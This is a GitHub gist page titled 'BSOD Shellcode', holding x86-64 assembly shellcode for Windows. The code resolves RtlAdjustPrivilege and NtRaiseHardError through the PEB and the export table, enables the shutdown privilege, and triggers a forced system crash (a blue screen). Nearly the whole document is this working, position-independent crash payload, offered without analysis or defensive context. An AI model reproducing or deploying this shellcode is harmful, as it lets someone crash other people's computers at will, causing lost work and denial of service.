Last active
August 13, 2025 03:31
-
-
Save rfl890/0eca5e877c3512419de8cebaf1fa87d7 to your computer and use it in GitHub Desktop.
BSOD Shellcode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .intel_syntax noprefix | |
| .global main | |
| .text | |
| main: | |
| # After setup: | |
| # r10 = DLL base | |
| # rax = number of exports | |
| # rdx = ordinals | |
| # r8 = function names | |
| # r9 = function addresses | |
| mov r10, gs:[0x60] # Get PEB | |
| mov r10, [r10 + 0x18] # PEB->Ldr | |
| mov r10, [r10 + 0x20] # InMemoryOrderModuleList.Flink | |
| mov r10, [r10] # Flink->Flink | |
| mov r10, [r10 + 0x20] # DllBase (offset of LDR_DATA_TABLE_ENTRY is -0x10) | |
| mov ecx, [r10 + 0x3c] # RVA of PE header | |
| lea rdx, [r10 + rcx + 0x18] # Address of optional header | |
| mov ecx, [rdx + 0x70] # RVA of export directory | |
| add rcx, r10 # RCX is at export directory | |
| mov edx, [rcx + 0x24] # RVA of ordinals | |
| add rdx, r10 # RDX is at ordinals | |
| mov r8d, [rcx + 0x20] # RVA of function names | |
| add r8, r10 # R8 is at function names | |
| mov r9d, [rcx + 0x1c] # RVA of function adresses | |
| add r9, r10 # R9 is at function adresses | |
| mov eax, [rcx + 0x18] # RAX contains the number of exports | |
| sub eax, 1 | |
| .loop_start: | |
| mov r11d, [r8 + (rax * 4)] | |
| add r11, r10 | |
| mov r14, rax | |
| push rax | |
| call strcmp_nt | |
| test rax, rax | |
| cmove r12, r14 | |
| call strcmp_rtl | |
| test rax, rax | |
| cmove r13, r14 | |
| pop rax | |
| dec rax | |
| jns .loop_start | |
| # at this point r12 = index of NtRaiseHardError, r13 = index of RtlAdjustPrivelege | |
| # read the ordinals | |
| mov r12w, [rdx + (2 * r12)] | |
| mov r13w, [rdx + (2 * r13)] | |
| # read function pointers | |
| mov r12d, [r9 + (4 * r12)] | |
| add r12, r10 | |
| mov r13d, [r9 + (4 * r13)] | |
| add r13, r10 | |
| # now the real fun begins :P | |
| sub rsp, 56 | |
| mov rcx, 19 | |
| mov rdx, 1 | |
| xor r8d, r8d | |
| lea r9, [rsp + 64] | |
| call r13 | |
| lea rax, [rsp + 72] | |
| mov ecx, 0xC00002B4 | |
| xor edx, edx | |
| xor r8d, r8d | |
| xor r9d, r9d | |
| mov QWORD PTR [rsp + 32], 6 | |
| mov QWORD PTR [rsp + 40], rax | |
| call r12 | |
| add rsp, 56 | |
| xor eax, eax | |
| ret | |
| strcmp_rtl: | |
| push r12 | |
| push r13 | |
| push r14 | |
| mov r12, 0 | |
| .strcmp_loop_start: | |
| movzx r13, BYTE PTR [r11 + r12] | |
| lea r14, [rip + strings] | |
| add r14, r12 | |
| movzx r14, BYTE PTR [r14] | |
| cmp r13, r14 | |
| jne .nomatch | |
| inc r12 | |
| cmp r12, 18 | |
| jne .strcmp_loop_start | |
| # strcmp_loop_end | |
| .match: | |
| pop r14 | |
| pop r13 | |
| pop r12 | |
| xor eax, eax | |
| ret | |
| .nomatch: | |
| pop r14 | |
| pop r13 | |
| pop r12 | |
| mov rax, 1 | |
| ret | |
| strcmp_nt: | |
| push r12 | |
| push r13 | |
| push r14 | |
| mov r12, 0 | |
| .strcmp_loop_start_nt: | |
| movzx r13, BYTE PTR [r11 + r12] | |
| lea r14, [rip + strings + 18] | |
| add r14, r12 | |
| movzx r14, BYTE PTR [r14] | |
| cmp r13, r14 | |
| jne .nomatch | |
| inc r12 | |
| cmp r12, 16 | |
| jne .strcmp_loop_start_nt | |
| # strcmp_loop_end | |
| pop r14 | |
| pop r13 | |
| pop r12 | |
| xor eax, eax | |
| ret | |
| strings: | |
| .ascii "RtlAdjustPrivilegeNtRaiseHardError" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment